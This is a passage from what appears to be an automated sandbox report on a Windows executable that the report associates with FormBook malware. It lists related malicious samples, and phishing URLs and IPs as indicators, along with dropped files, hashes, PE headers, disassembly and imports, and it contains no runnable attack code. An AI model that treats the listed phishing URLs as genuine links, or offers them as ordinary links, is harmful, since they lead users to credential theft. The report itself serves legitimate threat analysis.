                                                                    • 136.143.186.12
                                                                    z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • 136.143.186.12
                                                                    NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                    • 136.143.186.12
                                                                    DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                                    • 136.143.186.12
                                                                    PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                    • 136.143.186.12
                                                                    x.exeGet hashmaliciousFormBookBrowse
                                                                    • 136.143.186.12

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    AMAZON-02USARMV4L.elfGet hashmaliciousUnknownBrowse
                                                                    • 54.171.230.55
                                                                    wSoShbuXnJ.exeGet hashmaliciousFormBookBrowse
                                                                    • 3.252.97.86
                                                                    BLv4mI7zzY.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.228.81.39
                                                                    4.elfGet hashmaliciousUnknownBrowse
                                                                    • 18.131.143.241
                                                                    ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.248.169.48
                                                                    BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                                                    • 18.139.62.226
                                                                    n2pGr8w21V.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.248.169.48
                                                                    PGK60fNNCZ.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.248.169.48
                                                                    02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 76.223.54.146
                                                                    zAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.248.169.48
                                                                    ZOHO-ASUShttps://zfrmz.com/3GiGYUP4BArW2NBgkPU3Get hashmaliciousUnknownBrowse
                                                                    • 136.143.190.97
                                                                    https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956237c699124bb06f6840075804affff79070f72fbd27ec4885c3a2ba06657b8a52338eb80052baee9f74c4e2e0e7f85c073df939f1ac4dff75f76c95d46ac2361c7b14335e4f12c5c5d49c49b1d2f4c838a&action_type=SIGNGet hashmaliciousUnknownBrowse
                                                                    • 136.143.191.101
                                                                    Fantazy.sh4.elfGet hashmaliciousUnknownBrowse
                                                                    • 165.173.254.209
                                                                    https://workdrive.zohopublic.com/writer/open/p369v1c9203e54b114ff78bf68159454d9c26Get hashmaliciousUnknownBrowse
                                                                    • 136.143.190.75
                                                                    https://workdrive.zohopublic.com/writer/open/p369v39db425d23f84b09b5751cf359b081f4Get hashmaliciousUnknownBrowse
                                                                    • 136.143.190.75
                                                                    https://antiphishing.vadesecure.com/v4?f=bnJjU3hQT3pQSmNQZVE3aOMl-Yxz6sxP-_mvIRuY-wdnZ1bXTFIOIwMxyCDi0KedKx4XzS44_P2zUeNIsKUb0ScW6k1yl1_sQ4IsBBcClSw_vWV34HFG0fKKBNYTYHpo&i=SGI0YVJGNmxZNE90Z2thMHUqf298Dc88cJEXrW3w1lA&k=dFBm&r=SW5LV3JodE9QZkRVZ3JEYa6kbR5XAzhHFJ0zbTQRADrRG7ugnfE15pwrEQUVhgv3E2tVXwBw8NfFSkf3wOZ0VA&s=ecaab139c1f3315ccc0d88a6451dccec431e8ce1d856e71e5109e33657c13a3c&u=https%3A%2F%2Fsender5.zohoinsights-crm.com%2Fck1%2F2d6f.327230a%2F5f929700-cca4-11ef-973d-525400f92481%2F4cb2ae4047e7a38310b2b2641663917c123a5dec%2F2%3Fe%3DGKxHQ%252FSSm8D%252B%252B3g8VEcICaLHKdekhRU94ImygZ37tRI%253DGet hashmaliciousUnknownBrowse
                                                                    • 136.143.190.89
                                                                    https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956235d3ed2bb80da1204238e412cdfe561cf1e7cff409a79a97da8a2d431ccef9065ebae57f03416d61f0971abb897fde199a21f0da5d9085251df31eb6747d99920190103a51a045e3e309308fa5f3a1ca3&action_type=SIGNGet hashmaliciousHTMLPhisherBrowse
                                                                    • 136.143.190.172
                                                                    https://jkqbjwq.maxiite.comGet hashmaliciousHTMLPhisherBrowse
                                                                    • 204.141.42.148
                                                                    https://url.us.m.mimecastprotect.com/s/hI-dC2kAwJT85krqxhnf2I5Wy1H?domain=sign.zoho.comGet hashmaliciousUnknownBrowse
                                                                    • 204.141.43.101
                                                                    SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                    • 204.141.43.44
                                                                    NAMECHEAP-NETUS5by4QM3v89.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.192.23.123
                                                                    5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                    • 63.250.43.134
                                                                    https://services221.com/mm/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 198.54.116.108
                                                                    wWXR5js3k2.exeGet hashmaliciousFormBookBrowse
                                                                    • 63.250.43.134
                                                                    OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                                    • 63.250.43.134
                                                                    QmBbqpEHu0.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.193.6.134
                                                                    KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.236.169
                                                                    DpTbBYeE7J.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                    • 198.54.122.135
                                                                    1162-201.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.236.169
                                                                    https://delivery-pack.com/checkout/?add-to-cart=12Get hashmaliciousUnknownBrowse
                                                                    • 63.250.43.146
                                                                    CONTABODE1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                                                    • 161.97.142.144
                                                                    uG3I84bQEr.exeGet hashmaliciousFormBookBrowse
                                                                    • 161.97.142.144
                                                                    5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                    • 161.97.142.144
                                                                    0Wu31IhwGO.exeGet hashmaliciousFormBookBrowse
                                                                    • 161.97.142.144
                                                                    gKvjKMCUfq.exeGet hashmaliciousFormBookBrowse
                                                                    • 161.97.142.144
                                                                    https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.comGet hashmaliciousHTMLPhisherBrowse
                                                                    • 173.249.62.84
                                                                    https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.comGet hashmaliciousHTMLPhisherBrowse
                                                                    • 173.249.62.84
                                                                    4sfN3Gx1vO.exeGet hashmaliciousFormBookBrowse
                                                                    • 161.97.142.144
                                                                    82eqjqLrzE.exeGet hashmaliciousAsyncRATBrowse
                                                                    • 144.91.79.54
                                                                    DF2.exeGet hashmaliciousUnknownBrowse
                                                                    • 173.249.2.110

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Temp\5-19-2H

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\clip.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1209886597424439
                                                                    Encrypted:false
                                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                    MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                    SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                    SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                    SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\aut2D45.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\plZuPtZoTk.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):287232
                                                                    Entropy (8bit):7.994474853297339
                                                                    Encrypted:true
                                                                    SSDEEP:6144:LaJnmiN9IQghIOt39ziyBGTQEO2ET2CRSeKab+2d7Br3vG7Os/JRCHkz:LaNITLNzzghO2rCRdLK2Nl3vNGzhz
                                                                    MD5:0BC44F5335F34AF266C56C73E6EADA41
                                                                    SHA1:10DE8878ADF7AE6F517C27F0A3029BF591FF79D2
                                                                    SHA-256:9B72D101E16F22B548A9903C3C6646A9DE18602FE5B34324537831566C5B85C9
                                                                    SHA-512:D4CFD338BEFF9216F2BA132C31052F15483CF0A5761BA2566861E175672DED0DDBD505FC05493108D61C04A4E4FC58C82D5CD39C1979996C8D8F30B85D83D51D
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:...e.Q9EQ..:....s.BE..f1G...V7XQ9EQRFV353E2OBBFEWJN2ORVJV7.Q9E_M.X3.:...C..d."'Ao"$%1E9<.&0<(9G.Q .=7,f,9j.}.r;%2Rv\4OuRFV353EKNK.{%0.sR(.k*1.B...k2!.)..../%.\...rR(..#5_e1^.QRFV353Eb.BB.DVJ..^.VJV7XQ9E.RDW848E2.FBFEWJN2OR.^V7XA9EQ2BV35sE2_BBFGWJH2ORVJV7^Q9EQRFV3U7E2MBBFEWJL2..VJF7XA9EQRVV3%3E2OBBVEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV.AV=FOBB..SJN"ORV.R7XA9EQRFV353E2OBBfEW*N2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBB

                                                                    C:\Users\user\AppData\Local\Temp\directiveness

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\plZuPtZoTk.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):287232
                                                                    Entropy (8bit):7.994474853297339
                                                                    Encrypted:true
                                                                    SSDEEP:6144:LaJnmiN9IQghIOt39ziyBGTQEO2ET2CRSeKab+2d7Br3vG7Os/JRCHkz:LaNITLNzzghO2rCRdLK2Nl3vNGzhz
                                                                    MD5:0BC44F5335F34AF266C56C73E6EADA41
                                                                    SHA1:10DE8878ADF7AE6F517C27F0A3029BF591FF79D2
                                                                    SHA-256:9B72D101E16F22B548A9903C3C6646A9DE18602FE5B34324537831566C5B85C9
                                                                    SHA-512:D4CFD338BEFF9216F2BA132C31052F15483CF0A5761BA2566861E175672DED0DDBD505FC05493108D61C04A4E4FC58C82D5CD39C1979996C8D8F30B85D83D51D
                                                                    Malicious:false
                                                                    Preview:...e.Q9EQ..:....s.BE..f1G...V7XQ9EQRFV353E2OBBFEWJN2ORVJV7.Q9E_M.X3.:...C..d."'Ao"$%1E9<.&0<(9G.Q .=7,f,9j.}.r;%2Rv\4OuRFV353EKNK.{%0.sR(.k*1.B...k2!.)..../%.\...rR(..#5_e1^.QRFV353Eb.BB.DVJ..^.VJV7XQ9E.RDW848E2.FBFEWJN2OR.^V7XA9EQ2BV35sE2_BBFGWJH2ORVJV7^Q9EQRFV3U7E2MBBFEWJL2..VJF7XA9EQRVV3%3E2OBBVEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV.AV=FOBB..SJN"ORV.R7XA9EQRFV353E2OBBfEW*N2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBB

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.159394279736206
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:plZuPtZoTk.exe
                                                                    File size:1'272'832 bytes
                                                                    MD5:03473468fd10d42dd617a426dcffa92d
                                                                    SHA1:c1055cc7420cf9f54de46dc813920f34051e7131
                                                                    SHA256:5dd59f906130866850ab2c712dae59d43c0e0e30a6554022567957037c35dc28
                                                                    SHA512:c6fb7620696773e1729efd41b39cd7e87d87b3fce23a2beace4fe356d6daa461a8d2cd4a9cf65137b75c1607b6ec91fcf78684b27a766dfc884c637d71a96fba
                                                                    SSDEEP:24576:QqDEvCTbMWu7rQYlBQcBiT6rprG8aWFtXbag42s2Dpq2t4g5nM:QTvC/MTQYxsWR7aWDXs2s2D9D5n
                                                                    TLSH:A645CF027381D022FF9B92334F5AF6515BBC69260123E62F13981DB9BE705B1563E7A3
                                                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                                    File Icon

                                                                    Icon Hash:aaf3e3e3938382a0

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x420577
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x6764AAFD [Thu Dec 19 23:23:41 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:948cc502fe9226992dce9417f952fce3

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    call 00007F56F547F983h
                                                                    jmp 00007F56F547F28Fh
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    push dword ptr [ebp+08h]
                                                                    mov esi, ecx
                                                                    call 00007F56F547F46Dh
                                                                    mov dword ptr [esi], 0049FDF0h
                                                                    mov eax, esi
                                                                    pop esi
                                                                    pop ebp
                                                                    retn 0004h
                                                                    and dword ptr [ecx+04h], 00000000h
                                                                    mov eax, ecx
                                                                    and dword ptr [ecx+08h], 00000000h
                                                                    mov dword ptr [ecx+04h], 0049FDF8h
                                                                    mov dword ptr [ecx], 0049FDF0h
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    push dword ptr [ebp+08h]
                                                                    mov esi, ecx
                                                                    call 00007F56F547F43Ah
                                                                    mov dword ptr [esi], 0049FE0Ch
                                                                    mov eax, esi
                                                                    pop esi
                                                                    pop ebp
                                                                    retn 0004h
                                                                    and dword ptr [ecx+04h], 00000000h
                                                                    mov eax, ecx
                                                                    and dword ptr [ecx+08h], 00000000h
                                                                    mov dword ptr [ecx+04h], 0049FE14h
                                                                    mov dword ptr [ecx], 0049FE0Ch
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    mov esi, ecx
                                                                    lea eax, dword ptr [esi+04h]
                                                                    mov dword ptr [esi], 0049FDD0h
                                                                    and dword ptr [eax], 00000000h
                                                                    and dword ptr [eax+04h], 00000000h
                                                                    push eax
                                                                    mov eax, dword ptr [ebp+08h]
                                                                    add eax, 04h
                                                                    push eax
                                                                    call 00007F56F548202Dh
                                                                    pop ecx
                                                                    pop ecx
                                                                    mov eax, esi
                                                                    pop esi
                                                                    pop ebp
                                                                    retn 0004h
                                                                    lea eax, dword ptr [ecx+04h]
                                                                    mov dword ptr [ecx], 0049FDD0h
                                                                    push eax
                                                                    call 00007F56F5482078h
                                                                    pop ecx
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    mov esi, ecx
                                                                    lea eax, dword ptr [esi+04h]
                                                                    mov dword ptr [esi], 0049FDD0h
                                                                    push eax
                                                                    call 00007F56F5482061h
                                                                    test byte ptr [ebp+08h], 00000001h
                                                                    pop ecx

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 SP1 build 30729

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x60114.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1350000x7594.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0xd40000x601140x60200c6583115f752dfa38b46a5a8e36a4bc8False0.93156443026658data7.903182803750103IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x1350000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                    RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                    RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                    RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                    RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                    RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                    RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                    RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                    RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                    RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                    RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                    RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                                    RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                    RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                                    RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                    RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                    RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                    RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                    RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                    RT_RCDATA0xdc7b80x573dbdata1.0003246217177526
                                                                    RT_GROUP_ICON0x133b940x76dataEnglishGreat Britain0.6610169491525424
                                                                    RT_GROUP_ICON0x133c0c0x14dataEnglishGreat Britain1.25
                                                                    RT_GROUP_ICON0x133c200x14dataEnglishGreat Britain1.15
                                                                    RT_GROUP_ICON0x133c340x14dataEnglishGreat Britain1.25
                                                                    RT_VERSION0x133c480xdcdataEnglishGreat Britain0.6181818181818182
                                                                    RT_MANIFEST0x133d240x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                    Imports

                                                                    DLLImport
                                                                    WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                    MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                    WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                    IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                    USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                    UxTheme.dllIsThemeActive
                                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
